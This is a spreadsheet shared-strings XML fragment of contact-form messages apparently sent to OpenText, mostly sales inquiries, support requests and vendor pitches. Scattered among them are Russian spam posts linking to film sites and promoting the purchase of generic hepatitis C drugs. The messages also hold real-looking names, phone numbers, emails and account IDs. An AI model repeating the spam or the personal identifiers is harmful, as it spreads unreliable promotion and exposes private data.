  <si>
    <t>Looking for an B2B/EDI cloud solution</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
_x000D_
Le Groupe La Poste mène actuellement une étude économique pour le compte d'une collectivité (métropole). Dans ce contexte, nous avons retenu votre entreprise dans une short list d'éditeurs proposant des solutions d'ECM, GED et systèmes d'archivage._x000D_
_x000D_
Aussi, pourriez-vous, s'il vous plait, me recontacter afin que nous puissions échanger sur les tarifs (build et run) de votre solution Documentum ? Pour information, notre besoin est urgent (chiffres pour le 06/12/2017)_x000D_
_x000D_
D'avance, merci._x000D_
_x000D_
Vianney PETIT_x000D_
Chef de projet_x000D_
DIRECTION DES ARCHIVES DU GROUPE_x000D_
DEPARTEMENT GESTION DOCUMENTAIRE ET ARCHIVAGE ELECTRONIQUE_x000D_
Mobile : +33 6 42 14 82 69_x000D_
Tél. : +33 1 55 44 01 59</t>
  </si>
  <si>
    <t>Dear Sirs_x000D_
_x000D_
ARSEG is the insurance regulator and supervisor for Angolan market._x000D_
_x000D_
We are considering the implementation of a Document Management Solution in our organization._x000D_
_x000D_
I would like to get more information about Opentext_x000D_
_x000D_
Can I have a presentation or demo version of your product?_x000D_
_x000D_
Do you have a local/regional partner that I may contact?_x000D_
_x000D_
Does your product supports Portuguese language?_x000D_
_x000D_
Thank you in advance for your support._x000D_
_x000D_
Best regards,</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Open Text Editorial Team,_x000D_
 _x000D_
My name is Pranali, and I work closely with Voxai Solutions, a leading provider of technical and business expertise on contact center technologies. We noticed that you provide insightful customer service articles to your readers.  Would you be interested in posting a high quality customer experience article from our Voxai editors? Please take a look at our upcoming blog posts and let me know._x000D_
_x000D_
1.Best etiquette for your contact center chat bot_x000D_
2.Best practices in Social Customer care_x000D_
3.How to build a great IVR survey_x000D_
_x000D_
Thank you for your consideration. Looking forward to hearing from you._x000D_
_x000D_
Regards,_x000D_
Pranali Pawar_x000D_
Marketing Analyst_x000D_
Bay Leaf Digital_x000D_
</t>
  </si>
  <si>
    <t>I am doing a product analysis for one of the branch of Singapore Government with regards to single (enterprise)  document automation and I am comparing three (3) options namely:_x000D_
_x000D_
1. OpenText Exstream_x000D_
2. Adobe Experience Manager Form_x000D_
3. Intelledox Inifiti_x000D_
_x000D_
What are the advantages of Exstream vs the competitors? What are the disadvantages too. Also what are the integration points, can I integrate with IBM Filenet out of the box? _x000D_
_x000D_
I will have the discussion with the client on Monday. Appreicate for the further response or a call. _x000D_
Regards, _x000D_
Marvin</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am inquiring about the software and services that you offer. I represent a media publishing company here in Taiwan and am looking for a software platform that can help manage our content. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
We are setting up centralize data repository for our regional corporate offices (India, Germany, Korea, USA), we are seeking some effective EDRM solution._x000D_
_x000D_
Please advise, if you can help us._x000D_
_x000D_
Your speedy response would be appropriated      </t>
  </si>
  <si>
    <t>Hello,_x000D_
My account has been created and my email confirmed, but I still can't access to "my support" link in my account to download my product._x000D_
_x000D_
Could you please have a look a give me a feedback?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Sébastien Mingam_x000D_
IT - MS Motorservice France</t>
  </si>
  <si>
    <t xml:space="preserve">Wir haben seit Jahren mit der Fa. CyberHouse eine Partnerschaft bzw. Betreuung und Wartung  der städt. Internetauftritte, die mit OpenText erstellt wurden und werden. Via CyberHouse wurden die lizenzrechtl. Belange mit Opentext, wie Updateverträge, abgewickelt. CyberHouse beendet mit JAhresende die Partnerschaft zu Ihnen. Mit Jahresende wäre auch die Verlängerung des Updatevertrages fällig. Meine Frage: Kann die Verlängerung des Updatevertrages direkt über Sie erfolgen, bleiben die bestehenden Lizenzen bestehen, oder muss hier vertraglich etwas geändert werden. _x000D_
Vielleicht könnten Sie mich kommende Woche kontaktieren. Ich bedanke mich im voraus und verbleibe_x000D_
Mit freundlichen Grüßen_x000D_
Christian Koch </t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Hi, _x000D_
_x000D_
I have visited your site https://www.opentext.com and thought it was excellent.  Your site is professional and offers excellent value to your visitors._x000D_
_x000D_
I noticed that you have linked to other sites and thought my website might be of interest to you and your website visitors. Actually we deal in call center services , such as Inbound &amp; Outbound call center services . _x000D_
_x000D_
As our websites and target audience are closely related but we are not competing in any way, I hope that you will do a reciprocal link exchange with us. I have provided my site's details below, could you please let me know exactly what details to use when I link to your site._x000D_
_x000D_
--------------------------------------------------------------------------------------------_x000D_
_x000D_
Anchor Text:_x000D_
_x000D_
Call center services_x000D_
_x000D_
Link:_x000D_
https://bestcallcenter.in/_x000D_
_x000D_
_x000D_
--------------------------------------------------------------------------------------------_x000D_
_x000D_
 I look forward to your favourable response, and thank you in advance for your time and consideration. Please send your link details to us so that we can also add and inform you within few hours. _x000D_
_x000D_
Kind Regards,_x000D_
David</t>
  </si>
  <si>
    <t xml:space="preserve">Informationen zur Nutzung von OpenText; Technische Beratung; Produktpräsentation </t>
  </si>
  <si>
    <t>Participate global tour</t>
  </si>
  <si>
    <t>This is project manager zhao yan from tuopu China corporation ,we purchase one software from your company_x000D_
Please provide your company  Business License , Legal person passport or ID card (scanning copy)</t>
  </si>
  <si>
    <t>Updated logo for City of Calgary - please contact us to receive and amend your pages.</t>
  </si>
  <si>
    <t>Привет всем участникам! класный у вас сайт! _x000D_
Нашел интересную базу кино: [b] Лучшие мультфильмы 2017 список [/b] [url=http://kinofly.net/]http://kinofly.net/[/url] _x000D_
Тут: http://kinofly.net/news/10914-molchanie-martina-skorseze-vyydet-v-noyabre.html [b] «Молчание» Мартина Скорсезе выйдет в ноябре [/b] _x000D_
Здесь: [url=http://kinofly.net/news/9465-otel-iz-siyaniya-stanet-muzeem-filmov-uzhasov.html] Отель из «Сияния» станет музеем фильмов ужасов [/url] _x000D_
Здесь: http://kinofly.net/boevik/12082-maks-stil-max-steel-2016.html _x000D_
Здесь: http://kinofly.net/priklyucheniya/ [b] Лучшие приключения бесплатно [/b] _x000D_
Тут: [url=http://kinofly.net/novinki/] Новинки 2017 лучшие новинки фильмов [/url] _x000D_
Тут: [url=http://kinofly.net/] Новинки 2017 лучшие сериалы [/url] Новинки 2017 лучшие сериалы</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I just recently upgraded our right fax server._x000D_
Everything is great and all is working fine._x000D_
I just have one question, when we receive a fax before the upgrade we would get two confirmations one without the attachment and one with the fax attachment._x000D_
However now, we get two confirmations but both with the same attachment is there a reason why both confirmations for the fax have the same attachment?_x000D_
Let me know thanks._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We need to understand the process flow, as our team got changed. Basically we need to know what information we are sending and to whom using OpenText. Also, do we have any software installed for that in Insurance House. _x000D_
Thanks_x000D_
Mandar</t>
  </si>
  <si>
    <t>add more FOIP lines to our current Rightfax server.</t>
  </si>
  <si>
    <t>Need to know if the FirstClass have on premise application?  We have old First Class Server and need to be upgraded.</t>
  </si>
  <si>
    <t>Hello OpenText,_x000D_
Do you have a solution and service to migrate data from legacy backup tapes (SDLT, DLT etc..) to a Cloud? Basically digitizing and migrating data to the cloud, so that we can restore that data if needed from the cloud._x000D_
Thanks,_x000D_
Alex</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
This is Venu G Cirra, working as a BDM at MSRCOSMOS LLC, an E-Verified &amp; CMMI-3 frim. I hope that you are doing great. I am trying to touch base with you in regards to a business opportunity, I am seeking. I would like to become a vendor to your esteemed organization. I had been trying to reach your firm since long time, but never had enough luck. Can you please help me to get the opportunity to work with you/ your firm. I can put few recruiters to work exclusively on your open requirements. We can help you to both full time &amp; contract positions. Most of our submissions would be of GC &amp; USC. We also ensure to submit qualified profiles has we have our internal team who would screen the candidates before passing on to you. I would appreciate if you can help out to become one of the vendor to your firm. I am also sending a brief intro about our firm to your e-mail. Please take time to review &amp; revert back to me. If required we are fine to meet you personally &amp; discuss more about the opportunity. If any paper work is required, please do let us know.  Please feel free to send me the details to vgcirra@msrcosmos.com. Looking forward in hearing from you. Thanks once again for your  time.</t>
  </si>
  <si>
    <t xml:space="preserve">I recently updated to a new PC that is running windows 10.  As part of my job I am licensed to run OpenText Enterprise Now 15.  I downloaded the application from our service portal and found that I cannot open Exceed because of a "Cannot open default font" error.  I found your page (https://www.opentext.com/support/connectivity-support-statements/windows-10) where it states "Exceed 15 SP4 now supports the “Block Untrusted Fonts” group policy, which is a security feature introduced in Windows 10 / Server 2016."  My question is:  Where can I get a copy of service pack 4 so I can use Exceed?_x000D_
_x000D_
Thank you for your time,_x000D_
James </t>
  </si>
  <si>
    <t>Several issues</t>
  </si>
  <si>
    <t>Good afternoon, _x000D_
Since a couple of days ago I was having issues to get reports from Actuate. _x000D_
Today, when I tried to join a registration window asked me to login (apparently using my Amazon credentials) but after some tries I continue without access to the tool. _x000D_
It's highly important to get access to it because of data need. _x000D_
Could you, please, give me solution to this issue?_x000D_
Thanks a lot,</t>
  </si>
  <si>
    <t>First time in and trying to access My Support for the purpose of reporting a problem with Dialogue 8.6.103</t>
  </si>
  <si>
    <t xml:space="preserve">À l’attention des services : Ressources Humaines, Communication et Marketing_x000D_
Bonjour,_x000D_
_x000D_
Je suis traductrice freelance en espagnol-français et français espagnol._x000D_
Si vous avez besoin de faire réaliser une traduction, une relecture, des corrections de documents, je peux mettre ma connaissance et mon expérience à votre disposition pour vous rendre les services que vous attendez._x000D_
Pour avoir toutes les informations sur les modalités de notre éventuelle collaboration, je vous invite à découvrir mon site : _x000D_
www.traductionsespagnol-msolano.com_x000D_
Bonne lecture et à bientôt,_x000D_
Michelle SOLANO-NARDON_x000D_
E-mail : solano.nardon@gmail.com  _x000D_
</t>
  </si>
  <si>
    <t>We are interested in upgrading our existing RightFax platform for LEC SIP trunking and would like to schedule a call with our account rep to discuss.  We have an existing maintenance contract with OpenText, contract# 0012205216.  Thx, Jeff</t>
  </si>
  <si>
    <t>Interested in pricing on OpenText Capture Center. Spoke with Johannes Schacht who advised me to contact sales. I am a former OpenText employee who is familiar with this tool and have a client who could benefit from it.</t>
  </si>
  <si>
    <t>If i want to be your partner ? How is it in indonesia . Thx</t>
  </si>
  <si>
    <t xml:space="preserve">Pricing on latest version of RightFax - we currently run 9.4 on an old Server 2003 box.   That needs to change and our version won't run on Server 2012 R2.  </t>
  </si>
  <si>
    <t>I urgently need assistance to download brava 16.3 that I bought on the 16 November 2017._x000D_
I have great difficulty in downloading it and the assistance and links sent are not helping at all.</t>
  </si>
  <si>
    <t>I want to ask about the partnership procedures.</t>
  </si>
  <si>
    <t>Now that Barb McLatchlie is gone, who do I send orders to for Exceed, Exceed 3D, and the X/Motif dll?</t>
  </si>
  <si>
    <t xml:space="preserve">Request to increase the number of Infor personnel allow to add cases to OpenText_x000D_
_x000D_
Today we have a limit of three (3) persons allowed to open tickets in your support system. Today those three accounts have been assign to our Support Organization – one account per region. Now with the expansion of our Cloud offering we are in the dire need for more accounts allowed to enter cases to you on the account “Lawson International AB”. _x000D_
Our cloud business is growing and so are our Cloud Operations team which would be the ones we assign these new “accounts” to. As it works today our Cloud Operations team need to get a hold of one of the three persons currently allowed and get them to enter case to report for them. This causes unnecessary administration and delays of resolutions, making it hard for us to fulfill our contractual obligations to our mutual customers. _x000D_
_x000D_
As I said, our cloud business and operations team is growing and I request our limit of persons allowed to enter tickets in your support system is increased from 3 to 10 (plus 7). This would resolve our immediate need and take care of our need for the near future as well, so we don’t need to ask you to reevaluate soon again.  _x000D_
_x000D_
On a side note…_x000D_
_x000D_
If possible the account name “Lawson International AB” should be changed to “Infor” (or whatever the contract say). It been a few years now since we changed company name._x000D_
_x000D_
I prefer mail contact whenever possible._x000D_
_x000D_
Thanks,_x000D_
Claes Wettergren_x000D_
_x000D_
Infor Software Sweden AB_x000D_
claes.wettergren@infor.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Intresse an ECM - Content Suite</t>
  </si>
  <si>
    <t>We are reviewing a number of redaction software tools and as part of our research have downloaded the trial version of Redact-It.  I would like to know the costing for this software please in order for us to make an informed decision when we are ready to move forward.  _x000D_
Many thanks and kind regards_x000D_
Jessica Dixon_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t>Hi_x000D_
We have been running Exceed v6.2 for many years on our PCB test machines so we can use the MTL test software developed by Aeroflex.  We have recently moved sites and been bought out by GE, as part of the move we are having to migrate test systems to new servers and domains.  We have tried this on one machine, as part of the migration the PC name changes and now Exceed will now not launch 'All Xserver displays in use' is the error, we have tried some stuff but nothing has worked so we are going to reinstall Exceed as we suspect its something to do with the new used profile created when we migrated the PC.  I have come to reinstall Exceed, I have the box with the manuals etc but no install disk, I am assuming it has been misplaced when we moved sites.  I need to get this up and running asap is it possible for you to send out another install disk(s) or can I download the install files from somewhere?  I have a serial number from the box - EXMP IS-224817.  One further thing, our machines are running Win7, this version of Exceed looks like it only supports Win95/98/NT, do you have a version that supports Win7?  Although this version has been running on our machines fine with Win7._x000D_
Thanks and regards_x000D_
Keith</t>
  </si>
  <si>
    <t>Me and my colleagues are playing with the idea of getting EDi capabilities, and after speaking with the company NMBS, they have recommended i get in touch regarding what you can do for us to get us set up with EDI._x000D_
_x000D_
If you could give me a call on 01215857477 and ask for Matthew, I would like to find out more about what Opentext can do to help us set up EDI</t>
  </si>
  <si>
    <t>Dear Sir and Madam,_x000D_
your TempoBox solution is really nice and useful. Unfortunately the Tempo app doesn‘t work in iOS 11. When are you going to offer an update?_x000D_
_x000D_
Thank you. I am really looking forward to use the app in iOS11 again. _x000D_
_x000D_
Best wishes, Thomas Mäder</t>
  </si>
  <si>
    <t>Can you please provide me access for My Support</t>
  </si>
  <si>
    <t>Hello, we have an issue with ICC 7.5 SP5 (Patch 1) and I want to create a ticket, but I have no authorisations to do it. _x000D_
_x000D_
How did I must to proceed ?._x000D_
_x000D_
Best Regards_x000D_
S. Claus</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
_x000D_
_x000D_
Greetings from Adityaan Solutions,_x000D_
_x000D_
_x000D_
          We take the opportunity to introduce ourselves as Adityaan_x000D_
Solutions, one of the upcoming End to End HR Services provider,_x000D_
_x000D_
            Our services guarantee on being reliable, satisfactory and_x000D_
customer oriented. We master in providing impeccable leading edge_x000D_
HR Services and Solutions. We provide a range of services:_x000D_
_x000D_
1)      Recruitment Procedures,_x000D_
2)      Background Verification/ Check,_x000D_
3)      Induction &amp;Training and Development,_x000D_
4)      Employee Relation,_x000D_
5)      Compensation Designing &amp; Payroll Process,_x000D_
6)      Benefits Management,_x000D_
7)      Performance Management Support,_x000D_
8)      Employee Engagement &amp; Event Management,_x000D_
9)      HR Policies &amp; Procedure and Exit formalities._x000D_
_x000D_
_x000D_
Am waiting for your call if you are interested......_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Support Team_x000D_
Adityaan Solutions_x000D_
# Flat No: 302, Sanman PMR Heights,_x000D_
Opp. Lutheran Church, Lakdi-ka-pul,_x000D_
Hyderabad._x000D_
Website: www.adityaan.in_x000D_
PH: 8019009001/ 9885009001_x000D_
</t>
  </si>
  <si>
    <t>As a freelancer I'm interested in the reporting projects wherein I'd like to use OpenText Exstream product. _x000D_
As a starting point, I'd like to start with the developer licensed Extream engine for the same. _x000D_
Kindly provide me the further details on it.</t>
  </si>
  <si>
    <t>I have no access  to  contect  my support  so I can not find the page  that I can select the General ticket type yet!</t>
  </si>
  <si>
    <t>Hi Opentext team, _x000D_
_x000D_
We are looking for potential Vendor who can build the complete solution involving the following:_x000D_
1. Automate navigation of website_x000D_
2. Screen scrape details from the site_x000D_
3. Make payment to obtain document_x000D_
4. Download, OCR and extract details from the document_x000D_
5. Apply business rules to the extracted data_x000D_
_x000D_
It would be good to hear from you if you can help us achieve the following?_x000D_
_x000D_
Thanks,_x000D_
Vish</t>
  </si>
  <si>
    <t>Приветствую всех! класный у вас сайт! _x000D_
Нашел интересную базу кино:  [url=http://kinorulez.ru/]Список 2017 лучшая фантастика[/url] _x000D_
Тут: http://kinorulez.ru/news/3125-stala-izvestna-tochnaya-data-premery-seriala-gotem.html [b] Стала известна точная дата премьеры сериала «Готэм» [/b] _x000D_
Здесь: [url=http://kinorulez.ru/uzhasy/6302-lesnoy-zmey-wyrmwood-2014.html] Смотреть Лесной змей / Wyrmwood (2014) онлайн бесплатно [/url] _x000D_
Здесь: http://kinorulez.ru/drama/9846-dvadcatyy-vek-novecento-1976.html _x000D_
http://kinorulez.ru/komediya/ [b] 2017 бесплатно лучшие комедии [/b] _x000D_
[url=http://kinorulez.ru/melodrama/] 2017 в хорошем качестве лучшие мелодрамы [/url] _x000D_
[url=http://kinorulez.ru/istoricheskiy/] Лучшие исторические фильмы 2017 смотреть [/url] Лучшие исторические фильмы 2017 смотреть</t>
  </si>
  <si>
    <t>Hi _x000D_
We are looking for a web based user friendly document manangerment software which supports document control at all stages of project._x000D_
Please send us a form/questionnaire to fill our requirements for company._x000D_
Thanks and Regards_x000D_
Rama</t>
  </si>
  <si>
    <t>interested in the cost of sentiment analysis tool</t>
  </si>
  <si>
    <t>Concerta has been submitting support tickets on our behalf up until now, but we would like to be able to log issues an access any knowledge base items as well.</t>
  </si>
  <si>
    <t>We are considering automation of AP Invoicing and wanted to evaluate opentext</t>
  </si>
  <si>
    <t>Inquiry about training for RightFax</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
My name is Dillon from Vignette, a small production company based out of Washington state. I wanted to get in touch with whomever manages your web presence - regarding the domain “vignette.com” which redirects to your current site. We would potentially be interested in purchasing the domain for our own use and would like to know if you are interested in selling it, as we’ve noticed it hasn’t been active for a few years now._x000D_
_x000D_
Thanks, look forward to talking to you._x000D_
_x000D_
Dillon</t>
  </si>
  <si>
    <t>When sorting from one .tiff image to another in a folder, the order is not sequential to the naming structure. This affects my job as I cannot view a set of drawings in the proper order.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
_x000D_
Can you get hold of this product? We have a customer that would want about 10 licenses_x000D_
_x000D_
https://store.infograph.com/store/scripts/Brava.asp_x000D_
_x000D_
They want the second one down (PDF and CAD) I think the product code is:_x000D_
_x000D_
Brava! Desktop CXL _x000D_
(1000029103)_x000D_
_x000D_
Thanks_x000D_
dan </t>
  </si>
  <si>
    <t>looking for license cost and services for RightFax product quickly</t>
  </si>
  <si>
    <t>was told by kurtis thomas that this was the best way to reach out. getty images and opentext have a lot of mutual customers and in the first instance we are interested in discussing a way for those customers to use the content they have access to via getty images within the opentext environment. would be grateful for the opportunity to discuss in more detail with your product and/or partnership teams. best regards, mike</t>
  </si>
  <si>
    <t>Hello - I am trying to find out if there is a way to turn off the delivery reports for faxes that are sent? I would like to get notifications for ones that have an error only. Thank you.</t>
  </si>
  <si>
    <t>I would like to have a contact email to receive an RFI for an ECM solution (Middle East)</t>
  </si>
  <si>
    <t>Need to renew licenses maintenance for a customer in Spain. All the contacts I had do not answer. I think they do not belong anymore to the company. Target date 31/12/2018</t>
  </si>
  <si>
    <t>I am having issues viewing some of the documentation listed in Content_Server_SDK_16.2_-_Offline_Documentation.zip. We have a support contract and I am registered. I keep getting the following message ... "We're sorry, your account does not grant you access to this resource. Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us". I have received the confirmation email and have verified my email but still keep getting the above message.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I would like to be contacted regarding the upcoming license renewal for our Xenos software. The license will be expired on 12/31. Can you please send me a quote? _x000D_
_x000D_
Thanks,_x000D_
Kevin</t>
  </si>
  <si>
    <t>New Legal Department looking for a document management system</t>
  </si>
  <si>
    <t xml:space="preserve">I asked to have the password reset on the GXS catalog but never received an email with the new password.  I need to get in and update items immediately.  _x000D_
_x000D_
Network ID: RO763_x000D_
User ID: RO763A_x000D_
Acct:129167264413_x000D_
Please get back to me ASAP._x000D_
_x000D_
Thanks,_x000D_
Renee Thurow_x000D_
</t>
  </si>
  <si>
    <t>Looking for new fax solution</t>
  </si>
  <si>
    <t>I am a small office and am interested in the cost for the system, updates and support.</t>
  </si>
  <si>
    <t>Hi, You don't have your own email marketing, funnel, social media automation &amp; CRM product. I was wondering if there are opportunities for us to work together ?</t>
  </si>
  <si>
    <t>Hi, I see that you guys are in software business. We are CRM, Email Marketing, Funnels &amp; Social Media Automation startup and wondering if there are opportunities for us to partner together ?</t>
  </si>
  <si>
    <t xml:space="preserve">Our in house legal team is looking for a new document management system._x000D_
</t>
  </si>
  <si>
    <t>We have an older rightfax (9.4) server in our environment that we would like to expore what options you can provide for moving this into the cloud either with the emailtofax or hybrid solution.</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
bitte kontaktieren Sie mich bzgl. einer Produkt-Demo. Wir möchten im nächsten Jahr ein DAM-System einführen und würde gerne OpenText hierzu kennenlernen._x000D_
Beste Grüße_x000D_
Cornelia Gutsche</t>
  </si>
  <si>
    <t>I want to learn if this is a viable product for our company. We provide Probation Management Systems to Courts and we handle a lot of paper documents.</t>
  </si>
  <si>
    <t>I need to send a fax  and cannot remember what i type to send it</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am new to the project SI2M and I would like to have the same access as my colleague julien.lesage@capgemini.com. Could you please grant me this access? Thank you in advance!</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
I am looking for a contract management software with the below capabilities:_x000D_
•	On-premise_x000D_
•	Concurrent user licenses_x000D_
•	GSA schedule 70_x000D_
Please let me know if you are able to provide contract management software with these requirements._x000D_
</t>
  </si>
  <si>
    <t>Looking to license CCM solution</t>
  </si>
  <si>
    <t xml:space="preserve">I am reaching out to get more information on a product data management platform. </t>
  </si>
  <si>
    <t xml:space="preserve">Need access for this to download softwares and patches. Below are the details _x000D_
Licensee: Lycatel Services Ltd_x000D_
End User: EU0323721_x000D_
Customer Number: 209536_x000D_
Order Number: SUK08165207_x000D_
</t>
  </si>
  <si>
    <t>Hi, I confirmed my account a several times now and I am still not allowed to download ressources for the team developer we bought at MD consult in Germany. How can cyou help me?_x000D_
Kind regards_x000D_
Georg Strömer</t>
  </si>
  <si>
    <t>I have an account with GXS (# 125143427224) and I'm experiencing upload errors.  I need to speak with my account rep.</t>
  </si>
  <si>
    <t>Dears,_x000D_
_x000D_
Kindly informed that we looking for your agents in Egypt and we kindly recommend to submit all agents over Middle East if you have sole agent in Egypt._x000D_
_x000D_
Regards,,,</t>
  </si>
  <si>
    <t>Hello!_x000D_
_x000D_
I’m the vendor liaison for SourceSeek. We help software teams around the world to connect with great clients in the US and European market. We’re seeing huge demand for software teams this year, so we’re searching for more great software teams to partner with._x000D_
_x000D_
We’re very interested in learning more about Actuate. We’d like to learn more about your company and find out how we can help you grow in 2017. It’s easy to get started, just register your company at our website by clicking:_x000D_
_x000D_
https://www.sourceseek.com/vendor-signup/_x000D_
_x000D_
We’ll immediately send more info once we hear from you._x000D_
_x000D_
I look forward to learning more about Actuate!_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Jonalyn,_x000D_
Vendor Liaison, SourceSeek</t>
  </si>
  <si>
    <t xml:space="preserve"> Hi_x000D_
We are looking for a CCM solution that has four core elements: _x000D_
1.	Design tool_x000D_
2.	Composition engine_x000D_
3.	Workflow/rule engine _x000D_
4.	Multichannel output management_x000D_
_x000D_
Is it possible to provide me with a contact in sales for a signed NDA for issuing an RFI._x000D_
_x000D_
Kind regards,_x000D_
Tara - if you can please contact me by email.</t>
  </si>
  <si>
    <t>Exceed remote desktop application, integration to Philips products</t>
  </si>
  <si>
    <t>I need to dowload the EXCEED sw but I can't ._x000D_
I had Upgrade My Account to Access My Support and confirmed after received yuor email from OpenText Connect &lt;connect@opentext.com&gt;.</t>
  </si>
  <si>
    <t>Need sizing document and refernce for Opentext VIM server for S4HANA 1709</t>
  </si>
  <si>
    <t>Приглашаем тебя в спа центр красоты, где ты сможишь сделать: парафинотерапия. Мы приглашаем мужчин в наш спа на дому для парафинотерапии. Тяжело в нашем мире без ухода за сабой,приходите в нашспа на домугде вы получите все виды ухода за ногтями рук и ног. _x000D_
 _x000D_
Мы работаю в салоне ценю всякого своим посетителем делаювсе хорошо и аккуратно. Слежу за стерильностью инструментов которыми работаем во время **ман.пед и так дал*. _x000D_
 _x000D_
Наш салон маникюра не только для юнышей, но и для его второй половинки. _x000D_
Мы сделаем комплекс процедур таких как ногтевой сервис. _x000D_
 _x000D_
Наш салон горжусь своей высоким качеством. _x000D_
я помогаю сделать современный парафинотерапия. _x000D_
 _x000D_
Цены в нашем спа на дому невеликие и по карману всем и каждому. К нам в салон можно записаться по личному визиту. Инструметны стерилизуются после посетителя, помещение моется, все салфетки меняются на чистые одноразовые. _x000D_
 _x000D_
Школа ногтевого сервиса : [url=https://mzezina.ru/]СТУДИЯ НОГТЕВОГО СЕРВИСА[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Обсуждаем вопросы закупки лекарств в Индии, Египте, Бангладеш и других странах. _x000D_
Оригиналы и лицензионные генерики Совальди (Софосбувир), Харвони (Софосбувир+Ледипасвир), Даклинзы (Даклатасвир), Эпклусы (Софосбувир+Велпатасвир) и т.д.  _x000D_
 _x000D_
&lt;a href=https://hcv-forum.ru/&gt;какими препаратами лечат гепатит с&lt;/a&gt;_x000D_
&lt;a href=https://hcv-forum.ru/&gt;лечение софосбувиром отзывы&lt;/a&gt;_x000D_
 _x000D_
[url=https://hcv-forum.ru/]как принимать ледипасвир и софосбувир[/url]_x000D_
[url=https://hcv-forum.ru/]револад 50 мг купить в днепропетровске[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">wanted to know who is dealing with OpenText Gupta Team Developer Ver 6.0 .product in india , Hyderabad. one of our customer requires the same. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I cannot access the Teleform support any more.  Why has my account been changed to remove access to Teleform support.</t>
  </si>
  <si>
    <t>I have just installed Report builder 7 as part of our Infor Visual Manufacturing 9 install and there is a major bug in the software when creating totaling fields.   Infor has instructed to me to contact you.  Do you have the patched version of Version 7.0 Update 1 Build 50852 as this version could not have worked</t>
  </si>
  <si>
    <t>Looking for a cloud or non-landline based faxing service for a satellite office.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to get a quote on for the costs of EDI templates to work with Amazon Australia. </t>
  </si>
  <si>
    <t>hngfjhf</t>
  </si>
  <si>
    <t>We are an OpenText client in Troy, MI.  Need to what (if any) quality standard certifications are held by OpenText (ISO TS, IATF, VDA, ISO9001, or ISO14001).  Thank you.</t>
  </si>
  <si>
    <t>I need the contact information for the individual that would be responsible for the relationship with our organization. Roins Financial Services is our holding company and we operate under Royal &amp; Sun Alliance Insurance and Johnson Insurance as the main insurance carrier.</t>
  </si>
  <si>
    <t>Book a test drive for Saturday 02nd December - Ford Figo 1.4 Ambiente (demo)</t>
  </si>
  <si>
    <t xml:space="preserve">i want to know how could i give acces to your portal for service call to another team partner </t>
  </si>
  <si>
    <t>We are interested in expanding our use of Fax2Mail.  What account options and costs are available to us?  Our potential increase would be about 50 users.</t>
  </si>
  <si>
    <t>Interested in a campus intranet product with features as outlined in the OpenText First Class description. I was contacted by someone at OpenText who said they did not have a product that met my needs, but if the description of First Class is accurate, it would seem to meet our needs.</t>
  </si>
  <si>
    <t xml:space="preserve">We need to purchase some licensing within two weeks. Our current account rep is awful at communicating and wish to have a new one. Please help us. We are looking to purchase xPression licensing. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
3M is in the process of cleansing their master data.  Our records show that 3M makes payments to you, however we do not have a valid W8 form on file. This form is required as part of 3Ms standard business process._x000D_
_x000D_
Please respond to this email attaching a completed W9.  If you have any questions about this request you may contact me. _x000D_
_x000D_
Thank you in advance._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I am trying to log into my account and it keeps saying "authentication failed" when I know I am typing in my correct password and email address._x000D_
_x000D_
I tried to do the reset password on your site and I get the message saying my email isn't registered. I am very confused as I just logged in a few days ago in addition to the few other times I've logged in before. Is there any thing you can do to help  me? </t>
  </si>
  <si>
    <t>Приветствую! класный у вас сайт! _x000D_
Зацените, нашёл супер базу кино онлайн в хорошем качестве: [url=http://kinofanonline.ru/]хорошая комедия 2017 бесплатно[/url] _x000D_
Тут: http://kinofanonline.ru/boevik/ [b] 2017 смотреть лучшие боевики [/b] _x000D_
[url=http://kinofanonline.ru/melodrama/] 2017 бесплатно лучшие мелодрамы [/url] _x000D_
[url=http://kinofanonline.ru/voennyy/] Бесплатно лучшие военные фильмы [/url] Бесплатно лучшие военные фильмы _x000D_
[url=http://kinofanonline.ru/news/10095-kianu-rivz-i-enn-heteuey-okunutsya-v-sovremennyy-okean.html] Киану Ривз и Энн Хэтэуэй окунутся в "Современный океан" [/url] _x000D_
http://kinofanonline.ru/news/3912-maykl-bey-nashel-scenarista-svoim-kosmicheskim-motoram.html [b] Майкл Бэй нашел сценариста своим «Космическим моторам» [/b] _x000D_
http://kinofanonline.ru/dokumentalnyy/12988-volchya-staya-the-wolfpack-2015.html</t>
  </si>
  <si>
    <t>We would like to send at least 3, possibly 4 employees to the conference.  We do not know who will be attending at this time - depends upon their work load.  Is it possible to purchase the tickets now and transfer the names at a later date?</t>
  </si>
  <si>
    <t>Edocs for one of my clients who is a law firm.    I have worked extensively with Edocs DM and all it's predecessor  forms of the product.    Looking to do something like Edocs DM in the cloud of offered.  Need to migrate from LexisNexis Time Matters to your product.</t>
  </si>
  <si>
    <t>evaluating DAM solutions for global asset management. Looking at OT vs ADAM</t>
  </si>
  <si>
    <t>Kindly guide the path to request for Trial version binaries(source)of application "RightFax 10.6 FP2 SR2"</t>
  </si>
  <si>
